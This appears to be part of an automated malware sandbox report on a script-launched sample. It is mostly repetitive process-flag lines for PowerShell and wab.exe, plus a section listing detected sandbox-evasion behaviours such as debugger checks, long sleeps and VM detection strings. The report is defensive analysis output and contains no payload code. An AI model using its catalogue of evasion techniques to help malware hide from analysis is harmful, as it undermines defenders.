Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Switches to a custom stack to bypass stack traces
Source: C:\Program Files (x86)\Windows Mail\wab.exe API/Special instruction interceptor: Address: 5EFE35F
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 11_2_0040DD85
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4474 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5437 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7129 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2657 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 5183 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 4270 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: foregroundWindowGot 1769 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Program Files (x86)\Windows Mail\wab.exe API coverage: 9.5 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 1816 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6564 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6444 Thread sleep count: 7129 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4708 Thread sleep count: 2657 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3576 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1784 Thread sleep count: 244 > 30 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1784 Thread sleep time: -122000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3920 Thread sleep count: 5183 > 30 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3920 Thread sleep time: -15549000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3920 Thread sleep count: 4270 > 30 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3920 Thread sleep time: -12810000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 8_2_240C10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 8_2_240C10F1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 8_2_240C6580 FindFirstFileExA, 8_2_240C6580
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0040AE51 FindFirstFileW,FindNextFileW, 11_2_0040AE51
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 13_2_00407EF8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 14_2_00407898
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_00418981 memset,GetSystemInfo, 11_2_00418981
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: wscript.exe, 00000000.00000003.1997590256.00000203A2F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2002665387.00000203A2F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1998011593.00000203A2F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2001506645.00000203A2F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2000868107.00000203A2F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2000627783.00000203A2F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2001147023.00000203A2F6A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWXNi
Source: wscript.exe, 00000000.00000003.2000598221.00000203A2F9C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000000.00000003.1997590256.00000203A2F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2002665387.00000203A2F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1998011593.00000203A2F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2001506645.00000203A2F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2000868107.00000203A2F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2000627783.00000203A2F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2001147023.00000203A2F6A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2719854612.00000192FC9F0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3276172736.00000000084F8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000002.2002370211.00000203A116B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1998069751.00000203A1123000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1998183309.00000203A114B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2000490789.00000203A116B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Program Files (x86)\Windows Mail\wab.exe API call chain: ExitProcess graph end node
